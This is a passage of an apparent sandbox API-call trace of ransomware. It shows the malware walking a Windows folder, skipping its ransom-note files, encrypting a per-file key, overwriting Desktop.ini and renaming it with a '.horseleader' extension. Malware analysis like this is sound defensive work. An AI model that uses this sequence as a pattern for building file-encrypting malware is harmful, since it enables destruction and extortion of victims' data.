out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4ccff98, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4ccff98, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x442422c3, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x11eb, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Cave_Drawings.gif", cAlternateFileName="")) returned 1 [0245.737] lstrcmpiW (lpString1="Cave_Drawings.gif", lpString2="Windows") returned -1 [0245.737] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 79 [0245.737] StrStrIW (lpFirst="Cave_Drawings.gif", lpSrch=".horseleader") returned 0x0 [0245.737] lstrcmpW (lpString1="Cave_Drawings.gif", lpString2="#Decrypt#.txt") returned 1 [0245.737] lstrcmpW (lpString1="Cave_Drawings.gif", lpString2="_uninstalling_.png") returned 1 [0245.737] lstrlenW (lpString=".testttjffg") returned 11 [0245.737] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif", lpSrch=".testttjffg") returned 0x0 [0245.737] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.737] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.738] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.738] FindNextFileW (in: hFindFile=0x7c6860, 
lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4d6850c, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4d6850c, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4434cc55, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x90f, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Connectivity.gif", cAlternateFileName="")) returned 1 [0245.738] lstrcmpiW (lpString1="Connectivity.gif", lpString2="Windows") returned -1 [0245.738] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 78 [0245.738] StrStrIW (lpFirst="Connectivity.gif", lpSrch=".horseleader") returned 0x0 [0245.738] lstrcmpW (lpString1="Connectivity.gif", lpString2="#Decrypt#.txt") returned 1 [0245.738] lstrcmpW (lpString1="Connectivity.gif", lpString2="_uninstalling_.png") returned 1 [0245.738] lstrlenW (lpString=".testttjffg") returned 11 [0245.738] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif", lpSrch=".testttjffg") returned 0x0 [0245.738] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.738] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.738] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.738] FindNextFileW (in: hFindFile=0x7c6860, 
lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x80425158, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bf1d2d9, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bf1d2d9, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x285, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0245.739] lstrcmpiW (lpString1="Desktop.ini", lpString2="Windows") returned -1 [0245.739] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 73 [0245.739] StrStrIW (lpFirst="Desktop.ini", lpSrch=".horseleader") returned 0x0 [0245.739] lstrcmpW (lpString1="Desktop.ini", lpString2="#Decrypt#.txt") returned 1 [0245.739] lstrcmpW (lpString1="Desktop.ini", lpString2="_uninstalling_.png") returned 1 [0245.739] lstrlenW (lpString=".testttjffg") returned 11 [0245.739] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini", lpSrch=".testttjffg") returned 0x0 [0245.739] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.739] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.739] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.740] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\Stationery\\Desktop.ini") returned 73 [0245.740] StrStrW (lpFirst="Desktop.ini", lpSrch=".txt") returned 0x0 [0245.740] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=645) returned 1 [0245.740] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x285, lpOverlapped=0x0) returned 1 [0245.741] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffd7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.743] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x285, lpOverlapped=0x0) returned 1 [0245.744] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.744] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.744] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.744] CloseHandle (hObject=0x158) returned 1 [0245.745] GetProcessHeap () returned 0x780000 [0245.745] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.745] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.horseleader") returned 85 [0245.745] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" 
(normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini.horseleader")) returned 1 [0245.746] GetProcessHeap () returned 0x780000 [0245.746] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.746] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5015d96, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5015d96, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x444c9a01, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xed0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Dotted_Lines.emf", cAlternateFileName="")) returned 1 [0245.746] lstrcmpiW (lpString1="Dotted_Lines.emf", lpString2="Windows") returned -1 [0245.746] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned 78 [0245.746] StrStrIW (lpFirst="Dotted_Lines.emf", lpSrch=".horseleader") returned 0x0 [0245.746] lstrcmpW (lpString1="Dotted_Lines.emf", lpString2="#Decrypt#.txt") returned 1 [0245.746] lstrcmpW (lpString1="Dotted_Lines.emf", lpString2="_uninstalling_.png") returned 1 [0245.746] lstrlenW (lpString=".testttjffg") returned 11 [0245.746] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf", lpSrch=".testttjffg") returned 0x0 [0245.746] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.746] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, 
dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.747] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.747] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2acb98, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2acb98, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce04b5c8, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe7, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Garden.htm", cAlternateFileName="")) returned 1 [0245.747] lstrcmpiW (lpString1="Garden.htm", lpString2="Windows") returned -1 [0245.747] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned 72 [0245.747] StrStrIW (lpFirst="Garden.htm", lpSrch=".horseleader") returned 0x0 [0245.747] lstrcmpW (lpString1="Garden.htm", lpString2="#Decrypt#.txt") returned 1 [0245.747] lstrcmpW (lpString1="Garden.htm", lpString2="_uninstalling_.png") returned 1 [0245.747] lstrlenW (lpString=".testttjffg") returned 11 [0245.747] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", lpSrch=".testttjffg") returned 0x0 [0245.747] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.747] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, 
pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.748] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.748] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2acb98, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2acb98, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa410937, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x5d3f, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Garden.jpg", cAlternateFileName="")) returned 1 [0245.748] lstrcmpiW (lpString1="Garden.jpg", lpString2="Windows") returned -1 [0245.748] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned 72 [0245.748] StrStrIW (lpFirst="Garden.jpg", lpSrch=".horseleader") returned 0x0 [0245.748] lstrcmpW (lpString1="Garden.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.748] lstrcmpW (lpString1="Garden.jpg", lpString2="_uninstalling_.png") returned 1 [0245.748] lstrlenW (lpString=".testttjffg") returned 11 [0245.748] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", lpSrch=".testttjffg") returned 0x0 [0245.748] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.748] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.749] 
CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.749] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc50881ad, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc50881ad, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x444efb5f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1594, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Genko_1.emf", cAlternateFileName="")) returned 1 [0245.749] lstrcmpiW (lpString1="Genko_1.emf", lpString2="Windows") returned -1 [0245.749] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 73 [0245.749] StrStrIW (lpFirst="Genko_1.emf", lpSrch=".horseleader") returned 0x0 [0245.749] lstrcmpW (lpString1="Genko_1.emf", lpString2="#Decrypt#.txt") returned 1 [0245.749] lstrcmpW (lpString1="Genko_1.emf", lpString2="_uninstalling_.png") returned 1 [0245.749] lstrlenW (lpString=".testttjffg") returned 11 [0245.749] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf", lpSrch=".testttjffg") returned 0x0 [0245.749] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.750] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.750] CreateFileW (lpFileName="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.751] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc50d4467, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc50d4467, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44515cbd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2864, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Genko_2.emf", cAlternateFileName="")) returned 1 [0245.751] lstrcmpiW (lpString1="Genko_2.emf", lpString2="Windows") returned -1 [0245.751] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 73 [0245.751] StrStrIW (lpFirst="Genko_2.emf", lpSrch=".horseleader") returned 0x0 [0245.751] lstrcmpW (lpString1="Genko_2.emf", lpString2="#Decrypt#.txt") returned 1 [0245.751] lstrcmpW (lpString1="Genko_2.emf", lpString2="_uninstalling_.png") returned 1 [0245.751] lstrlenW (lpString=".testttjffg") returned 11 [0245.751] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf", lpSrch=".testttjffg") returned 0x0 [0245.751] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.752] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.752] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.752] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5120721, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5120721, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4453be1b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1c7f4, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Graph.emf", cAlternateFileName="")) returned 1 [0245.752] lstrcmpiW (lpString1="Graph.emf", lpString2="Windows") returned -1 [0245.752] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 71 [0245.752] StrStrIW (lpFirst="Graph.emf", lpSrch=".horseleader") returned 0x0 [0245.752] lstrcmpW (lpString1="Graph.emf", lpString2="#Decrypt#.txt") returned 1 [0245.752] lstrcmpW (lpString1="Graph.emf", lpString2="_uninstalling_.png") returned 1 [0245.753] lstrlenW (lpString=".testttjffg") returned 11 [0245.753] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf", lpSrch=".testttjffg") returned 0x0 [0245.753] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.753] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.753] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf" (normalized: "c:\\program 
files\\common files\\microsoft shared\\stationery\\graph.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.754] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2d2cf5, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2d2cf5, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce071725, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Green Bubbles.htm", cAlternateFileName="")) returned 1 [0245.754] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="Windows") returned -1 [0245.754] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 79 [0245.754] StrStrIW (lpFirst="Green Bubbles.htm", lpSrch=".horseleader") returned 0x0 [0245.754] lstrcmpW (lpString1="Green Bubbles.htm", lpString2="#Decrypt#.txt") returned 1 [0245.754] lstrcmpW (lpString1="Green Bubbles.htm", lpString2="_uninstalling_.png") returned 1 [0245.754] lstrlenW (lpString=".testttjffg") returned 11 [0245.754] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm", lpSrch=".testttjffg") returned 0x0 [0245.755] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.755] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.755] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program 
files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.756] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2f8e52, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2f8e52, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa436a95, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1906, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="GreenBubbles.jpg", cAlternateFileName="")) returned 1 [0245.756] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="Windows") returned -1 [0245.756] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg") returned 78 [0245.756] StrStrIW (lpFirst="GreenBubbles.jpg", lpSrch=".horseleader") returned 0x0 [0245.756] lstrcmpW (lpString1="GreenBubbles.jpg", lpString2="#Decrypt#.txt") returned 1 [0245.756] lstrcmpW (lpString1="GreenBubbles.jpg", lpString2="_uninstalling_.png") returned 1 [0245.756] lstrlenW (lpString=".testttjffg") returned 11 [0245.756] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg", lpSrch=".testttjffg") returned 0x0 [0245.756] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.756] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.757] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program 
files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0245.757] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4fc9adc, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4fc9adc, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4453be1b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xb68, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="grid_(cm).wmf", cAlternateFileName="")) returned 1 [0245.757] lstrcmpiW (lpString1="grid_(cm).wmf", lpString2="Windows") returned -1 [0245.757] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 75 [0245.757] StrStrIW (lpFirst="grid_(cm).wmf", lpSrch=".horseleader") returned 0x0 [0245.757] lstrcmpW (lpString1="grid_(cm).wmf", lpString2="#Decrypt#.txt") returned 1 [0245.758] lstrcmpW (lpString1="grid_(cm).wmf", lpString2="_uninstalling_.png") returned 1 [0245.758] lstrlenW (lpString=".testttjffg") returned 11 [0245.758] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf", lpSrch=".testttjffg") returned 0x0 [0245.758] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.758] CryptEncrypt 